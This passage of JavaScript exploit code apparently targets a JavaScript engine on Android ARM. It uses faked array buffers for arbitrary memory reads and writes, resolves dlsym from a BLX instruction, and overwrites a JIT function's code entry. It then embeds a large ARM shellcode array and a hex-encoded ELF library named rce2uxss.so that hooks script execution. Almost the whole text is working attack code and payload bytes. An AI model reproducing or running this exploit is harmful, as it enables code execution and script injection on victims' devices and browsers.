        var i10l = (val & 0x7fe0000) >> 17;
        var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);
        return ((addr + 4) & ~3) + off;
      }
      function backup_original_code(start_address){
        var backup_arr = [];
        set_access_address(start_address);
        var u8arr=new Uint8Array(faked_ab);
        for(var i=0;i<shellcode.length+4096;i++){
          backup_arr[i]=u8arr[i];
        }
        return backup_arr;
      }
      function restore_original_code(start_address,backup_arr){
        set_access_address(start_address);
        var u8arr=new Uint8Array(faked_ab);
        for(var i=0;i<shellcode.length+4096;i++){
          u8arr[i]=backup_arr[i];
        }
      }
      huge_func({});
      print("blx instruction content is "+to_hex(read_uint32_unalign(pattern_position-4)));
      var dlsym_addr = get_dest_from_blx(pattern_position-4);
      print("dlsym address is "+to_hex(dlsym_addr));
      var huge_func_address = getObjAddr(huge_func)-1;
      print("huge func address is "+to_hex(huge_func_address));
      for(var i=0;i<20;i++){
        print(to_hex(read_uint32(huge_func_address+i*4)));
      }
      var huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4
      print("huge func code entry is "+to_hex(huge_func_code_entry));
      print(to_hex(read_uint32(huge_func_code_entry)));
      //var so_str= "";
      var shellcode =
[0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2
,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5
,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe5,0x1e,0xb1,0xcd,0xe5,0x6d,0xb0,0xa0,0xe3,0x13,0x81,0xcd,0xe5,0x21,0x81,0xcd,0xe5,0x22,0x71,0xcd,0xe5,0x23,0x91,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x63,0x30,0xa0,0xe3,0x70,0x20,0xa0,0xe3,0x14,0x00,0x8d,0xe5,0x73,0xe0,0xa0,0xe3,0x68,0x10,0x8d,0xe2,0x6a,0x60,0xcd,0xe5,0x6d,0x20,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x68,0xe0,0xcd,0xe5,0x10,0x00,0x9d,0xe5,0x6b,0x30,0xcd,0xe5,0x6c,0xb0,0xcd,0xe5,0x69,0x70,0xcd,0xe5,0x6e,0x90,0xcd,0xe5,0x3c,0xff,0x2f,0xe1,0x20,0xc0,0x95,0xe5,0xb0,0x90,0xcd,0xe5,0x78,0x20,0xa0,0xe3,0xb2,0xe3,0xd5,0xe1,0x25,0x10,0xa0,0xe3,0x2c,0x30,0xa0,0xe3,0xa9,0x20,0xcd,0xe5,0x00,0xb0,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0xa8,0x10,0xcd,0xe5,0x0c,0xc0,0x85,0xe0,0xab,0x10,0xcd,0xe5,0x0e,0xe1,0x8e,0xe0,0xae,0x10,0xcd,0xe5,0x02,0x10,0x8d,0xe0,0x20,0xc0,0x8d,0xe5,0x20,0xc0,0x95,0xe5,0xac,0x20,0xcd,0xe5,0xaf,0x20,0xcd,0xe5,0xa8,0x20,0x8d,0xe2,0xaa,0x30,0xcd,0xe5,0x8e,0xe1,0x8c,0xe0,0xad,0x30,0xcd,0xe5,0x05,0x30,0xa0,0xe1,0x05,0xc0,0x8e,0xe0,0x10,0xe0,0x9c,0xe5,0x00,0xc0,0x8d,0xe5,0x0e,0xc0,0x85,0xe0,0x24,0xc0,0x8d,0xe5,0x04,0xc0,0x8d,0xe5,0x14,0xc0,0x9d,0xe5,0x3c,0xff,0x2f,0xe1,0x73,0xe0,0xa0,0xe3,0x6d,0x00,0xa0,0xe3,0x89,0xa0,0xcd,0xe5,0x67,0xc0,0xa0,0xe3,0x2e,0x30,0xa0,0xe3,0x91,0xa0,0xcd,0xe5,0x79,0x20,0xa0,0xe3,0x65,0x10,0xa0,0xe3,0x8c,0xe0,0xcd,0xe5,0x8e,0x00,0xcd,0xe5,0x6c,0x00,0xa0,0xe3,0x94,0xe0,0xcd,0xe5,0x6f,0xe0,0xa0,0xe3,0x51,0xc0,0xcd,0xe5,0x70,0xc0,0xa0,0xe3,0x96,0x60,0xcd,0xe5,0x52,0xe0,0xcd,0xe5,0x5f,0xe0,0xa0,0xe3,0xb5,0x60,0xcd,0xe5,0xb7,0x00,0xcd,0xe5,0xb9,0xc0,0xcd,0xe5,0x69,0xc0,0xa0,0xe3,0xba,0x00,0xcd,0xe5,0xc1,0x60,0xcd,0xe5,0x8b,0x80,0xcd,0xe5,0x8f,0x90,0xcd,0xe5,0x93,0x80,0xcd,0xe5,0x95,0x70,0xcd,0xe5,0x97,0x90,0xcd,0xe5,0x53,0x70,0xcd,0xe5,0x54,0x90,0xcd,0xe5,0xbb,0x70,0xcd,0xe5,0xbc,0x90,0xcd,0xe5,0x88,0x30,0xcd,0xe5,0x90,0x30,0xcd,0xe5,0x50,0x30,0xcd,0xe5,0xb4,0x30,0xcd,0xe5,0xb8,0x30,0xcd,0xe5,0xc0,0x30,0xcd,0xe5,0x8a,0x20,0xcd,0xe5,0x8d,0x20,0xcd,0xe5,0x92,0x20,0xcd,0xe5
,0xb6,0x10,0xcd,0xe5,0xc2,0x10,0xcd,0xe5,0xc3,0x00,0xcd,0xe5,0xb0,0x03,0xd5,0xe1,0xd1,0xe0,0xcd,0xe5,0x61,0xe0,0xa0,0xe3,0xc5,0xa0,0xcd,0xe5,0xd3,0x60,0xcd,0xe5,0xd4,0x60,0xcd,0xe5,0x09,0x00,0x50,0xe1,0xd9,0xa0,0xcd,0xe5,0x6c,0xa0,0xa0,0xe3,0xde,0x60,0xcd,0xe5,0xe2,0x60,0xcd,0xe5,0x6f,0x60,0xa0,0xe3,0xc4,0x30,0xcd,0xe5,0xc6,0x20,0xcd,0xe5,0xc7,0x80,0xcd,0xe5,0xc8,0x90,0xcd,0xe5,0xcc,0x30,0xcd,0xe5,0xcd,0xc0,0xcd,0xe5,0xce,0x80,0xcd,0xe5,0xcf,0xc0,0xcd,0xe5,0xd0,0x70,0xcd,0xe5,0xd2,0xe0,0xcd,0xe5,0xd5,0xe0,0xcd,0xe5,0xd6,0x20,0xcd,0xe5,0xd7,0x90,0xcd,0xe5,0xd8,0x30,0xcd,0xe5,0xda,0xe0,0xcd,0xe5,0xdb,0x70,0xcd,0xe5,0xdc,0xe0,0xcd,0xe5,0xdd,0x30,0xcd,0xe5,0xdf,0x10,0xcd,0xe5,0xe0,0xa0,0xcd,0xe5,0xe1,0x30,0xcd,0xe5,0xe3,0x60,0xcd,0xe5,0xe4,0x90,0xcd,0xe5,0xa6,0x00,0x00,0x0a,0xcc,0xa0,0x8d,0xe2,0xd8,0x60,0x8d,0xe2,0x20,0x70,0x9d,0xe5,0x88,0x20,0x8d,0xe2,0x90,0x30,0x8d,0xe2,0x20,0x90,0x8d,0xe5,0x2c,0x90,0x8d,0xe5,0x09,0x80,0xa0,0xe1,0x50,0x00,0x8d,0xe2,0xb4,0xc0,0x8d,0xe2,0xc0,0xe0,0x8d,0xe2,0x40,0xa0,0x8d,0xe5,0x48,0x60,0x8d,0xe5,0x03,0xa0,0xa0,0xe1,0x24,0x60,0x9d,0xe5,0x44,0x90,0x8d,0xe5,0x24,0x90,0x8d,0xe5,0x02,0x90,0xa0,0xe1,0x14,0x00,0x8d,0xe5,0x28,0xc0,0x8d,0xe5,0x3c,0xe0,0x8d,0xe5,0x4c,0x40,0x8d,0xe5,0x00,0x40,0x97,0xe5,0x09,0x10,0xa0,0xe1,0x04,0x40,0x86,0xe0,0x04,0x00,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x24,0x70,0x8d,0x05,0x1e,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x0a,0x10,0xa0,0xe1,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x2c,0x70,0x8d,0x05,0x18,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0x50,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x13,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xb4,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x20,0x70,0x8d,0x05,0x0d,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xc0,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x44,0x70,0x8d,0x05,0x07,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xcc,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0x02,0x00,0x00,0x0a,0x04,0x00,0xa0,0xe1,0xd8,0x10,0x8d,0xe2,0x3b,0xff,0x2f,0xe1
,0xb0,0x13,0xd5,0xe1,0x01,0x80,0x88,0xe2,0x28,0x70,0x87,0xe2,0x01,0x00,0x58,0xe1,0xd3,0xff,0xff,0xba,0x4c,0x40,0x9d,0xe5,0x44,0x90,0x9d,0xe5,0x24,0xa0,0x9d,0xe5,0x20,0x20,0x9d,0xe5,0x2c,0x30,0x9d,0xe5,0x20,0xc0,0x9d,0xe5,0x14,0xe0,0x92,0xe5,0x10,0x10,0x93,0xe5,0x10,0x30,0x9a,0xe5,0x10,0x60,0x9c,0xe5,0xae,0x21,0xb0,0xe1,0x01,0x70,0x85,0xe0,0x03,0xe0,0x85,0xe0,0x06,0x60,0x85,0xe0,0x1b,0x00,0x00,0x0a,0x00,0x80,0xa0,0xe3,0x24,0xb0,0x8d,0xe5,0x1c,0xb0,0x9d,0xe5,0x1c,0x90,0x8d,0xe5,0x08,0x90,0xa0,0xe1,0x20,0x80,0x9d,0xe5,0x20,0xa0,0x8d,0xe5,0x06,0xa0,0xa0,0xe1,0x0e,0x60,0xa0,0xe1,0x14,0x50,0x8d,0xe5,0x04,0x20,0x9a,0xe5,0x01,0x90,0x89,0xe2,0x08,0xa0,0x8a,0xe2,0x08,0x50,0x1a,0xe5,0x10,0x00,0x9d,0xe5,0x52,0xe4,0xef,0xe7,0x0e,0x12,0x96,0xe7,0x01,0x10,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x05,0x00,0x84,0xe7,0x14,0x30,0x98,0xe5,0xa3,0x01,0x59,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x50,0x9d,0xe5,0x06,0xe0,0xa0,0xe1,0x24,0xb0,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x20,0xa0,0x9d,0xe5,0x14,0xc0,0x99,0xe5,0x10,0x20,0x99,0xe5,0xac,0x11,0xb0,0xe1,0x00,0x10,0xa0,0x13,0x02,0x50,0x85,0xe0,0x01,0x00,0xa0,0x11,0x0c,0x00,0x00,0x0a,0x01,0x30,0xa0,0xe1,0x01,0x00,0x80,0xe2,0x05,0xc0,0xb3,0xe7,0x08,0x10,0x81,0xe2,0x04,0x20,0x93,0xe5,0x52,0x34,0xef,0xe7,0x03,0x22,0x8e,0xe0,0x04,0x30,0x92,0xe5,0x04,0x20,0x83,0xe0,0x04,0x20,0x8c,0xe7,0x14,0xc0,0x99,0xe5,0xac,0x01,0x50,0xe1,0xf2,0xff,0xff,0x3a,0x14,0x00,0x9a,0xe5,0x2b,0x1b,0x9f,0xed,0x20,0x22,0xb0,0xe1,0x20,0x1b,0x8d,0xed,0x0e,0x80,0xa0,0x11,0x00,0x60,0xa0,0x13,0x80,0x50,0x8d,0x12,0x04,0x00,0x00,0x1a,0x0d,0x00,0x00,0xea,0x14,0x90,0x9a,0xe5,0x10,0x80,0x88,0xe2,0x29,0x02,0x56,0xe1,0x09,0x00,0x00,0x2a,0x00,0xe0,0x98,0xe5,0x05,0x10,0xa0,0xe1,0x01,0x60,0x86,0xe2,0x0e,0x00,0x87,0xe0,0x3b,0xff,0x2f,0xe1,0x00,0x00,0x50,0xe3,0xf4,0xff,0xff,0x1a,0x04,0x70,0x98,0xe5,0x07,0x40,0x84,0xe0,0x01,0x00,0x00,0xea,0xcc,0x4c,0x0c,0xe3,0x14,0x48,0xdf,0xe7,0x18,0xb0,0x9d,0xe5,0x70,0x10,0x8d,0xe2,0xe8,0x20,0x8d,0xe2,0x30,0x50,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x0c,0xa0,0x9b,0xe5,0x08,0x30,0x9b,0xe5
,0x00,0xa0,0x8d,0xe5,0x35,0xff,0x2f,0xe1,0x18,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x4b,0xdf,0x8d,0xe2,0xf0,0x8f,0xbd,0xe8,0x00,0x90,0xa0,0xe1,0x20,0x00,0x8d,0xe5,0x00,0xa0,0xa0,0xe1,0x2c,0x00,0x8d,0xe5,0x00,0x20,0xa0,0xe1,0x00,0x30,0xa0,0xe1,0x98,0xff,0xff,0xea,0x00,0xf0,0x20,0xe3,0x73,0x6f,0x5f,0x6d,0x61,0x69,0x6e,0x00,]; var so_str = "7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768
742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309d
e5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e2003093e51c209de50c2082e200208de50600a0e380209fe502208fe00210a0e178209fe502208fe015ffffeb08309de51c209de5002083e564309fe503308fe0003093e5013083e20c009de508109de533ff2fe10030a0e10300a0e124d08de204f09de4d4190000a8190000ac190000901900004406000040060000f005000008060000f8180000d418000090180000881800006c18000038180000dc040000f4040000d817000010402de928d04de20c008de570439fe504408fe06c339fe5033094e7003093e524308de560339fe503308fe00030d3e5013023e27330efe6000053e3c700000a48339fe503308fe00120a0e30020c3e50600a0e338339fe503308fe00310a0e130339fe503308fe00320a0e10c309de5d9feffeb0c309de5003093e514308de50600a0e310339fe503308fe00310a0e108339fe503308fe00320a0e114309de5cdfeffeb0c309de5183083e2003093e50320a0e1e8329fe503308fe0002083e50c309de51c3083e2002093e5d4329fe503308fe0002083e5cc329fe503308fe0003093e5c4229fe502208fe0001092e5bc229fe502208fe0002092e500108de504208de50600a0e3a8229fe502208fe00210a0e1a0229fe502208fe0aefeffeb98229fe502208fe01c308de2000092e5041092e50300a3e814309de580229fe502208fe00200a0e10c10a0e30320a0e180330ce3c93140e3d6feffeb18008de518209de514309de5032082e054329fe503308fe0002083e54c329fe503308fe0003093e50c3083e2012083e23c329fe503308fe0002083e534329fe503308fe0003093e50600a0e328229fe502208fe00210a0e120229fe502208fe086feffeb18309de5010073e36400000a010aa0e384feffeb0030a0e10320a0e1fc319fe503308fe0002083e5f4319fe503308fe0003093e50600a0e3e8219fe502208fe00210a0e1e0219fe502208fe072feffebd8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e375feffebb8319fe503308fe0003093e5ff3ec3e30f30c3e30300a0e1021aa0e30720a0e36cfeffeb98319fe503308fe0002093e590319fe503308fe002c0a0
e10700b3e800008ce504108ce508208ce578319fe503308fe0003093e50c2083e2df380fe300304fe3003082e560319fe503308fe0002093e51030a0e3033082e050219fe502208fe0002092e5002083e50600a0e340319fe503308fe00310a0e138319fe503308fe00320a0e130319fe503308fe03cfeffeb0600a0e324319fe503308fe00310a0e11c319fe503308fe00320a0e134feffeb10319fe503308fe0003093e50320a0e1df380fe300304fe3003082e5f8309fe503308fe0003093e5043083e2ec209fe502208fe0002083e50600a0e3e0309fe503308fe00310a0e1d8309fe503308fe00320a0e11efeffeb20309fe5033094e724209de5003093e5030052e10000000a26feffeb28d08de21080bde81c170000fcffffff5517000039170000f40300001c040000c403000008040000b8160000a416000098160000881600007c160000400300009c030000040400001c16000008160000fc150000d8150000dc150000a0020000100300008c1500008015000050020000dc020000581500004015000010150000f4140000e8140000cc140000b41400008401000020020000a8faffff5c010000140200006c1400005014000050faffff04010000c801000084f8ff7fb0b0078054f9ff7f00840880bcfbff7fb0a80980e8ffff7f010000006578706c6f697400746869732069732025782c736f75726365436f6465206174202578006c656e2069732025642c25730000000061727261792062756666657220616464726573732061742025780000646c6f70656e206164647265737320617420257800000000737472696e672069732025642c25702c2573000066696e6420636f6d70696c652066756e6374696f6e20617420257800636f6465736e6970742061742025700066616b655f646f4578656375746553637269707420617420257000006265666f726520686f6f6b00616674657220686f6f6b00000302010204050607000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000c404000003000000d41f000002000000400000001700000010040000140000001100000011000000f803000012000000180000001300000008000000faffff6f0200000006000000480100000b000000100000
0005000000380200000a0000006d01000004000000a803000001000000a900000001000000b100000001000000b900000001000000c600000001000000d500000001000000e100000001000000ee00000001000000fa000000010000000c010000010000002901000001000000360100000100000042010000010000004b0100000e000000610100001a000000a41e00001c000000040000001e00000008000000fbffff6f01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005004000050040000500400005004000050040000500400005004000050040000002000002de9f04f0746a1b008468846004743433a2028474e552920342e3800040000000900000004000000474e5500676f6c6420312e3131000000413d00000061656162690001330000000541524d20763700060a0741080109020a030c011102120414011501170318011a021b031e0622012a012c02440372636532757873732e736f0064b3a5da002e7368737472746162002e696e74657270002e64796e73796d002e64796e737472002e68617368002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b000000010000000200000034010000340100001300000000000000000000000100000000000000130000000b000000020000004801000048010000f0000000030000000100000004000000100000001b000000030000000200000038020000380200006d01000000000000000000000100000000000000230000000500000002000000a8030000a80300005000000002000000000000000400000004000000290000000900000002000000f8030000f8030000180000000200000000000000040000000800000032000000090000000200000010040000100400004000000002000000070000000400000008000000360000000100000006000000500400005004000074000000000000000000000004000000000000003b0000000100000006000000c4040000c40400001008000000000000000000000400000000000000410000000100007082000000d40c0000d40c000020000000080000000000000004000000080000004c00000001000000020000
00f40c0000f40c0000e400000000000000000000000400000000000000540000000f00000003000000a41e0000a40e00000400000000000000000000000400000000000000600000000600000003000000a81e0000a80e00002801000003000000000000000400000008000000690000000100000003000000d01f0000d00f000030000000000000000000000004000000000000006e000000010000000300000000200000001000001000000000000000000000000400000000000000740000000800000003000000102000001010000016000000000000000000000004000000000000007900000001000000300000000000000010100000100000000000000000000000010000000100000082000000070000000000000000000000201000001c00000000000000000000000400000000000000990000000300007000000000000000003c1000003e00000000000000000000000100000000000000a90000000100000000000000000000007a1000001000000000000000000000000100000000000000010000000300000000000000000000008a100000b800000000000000000000000100000000000000";
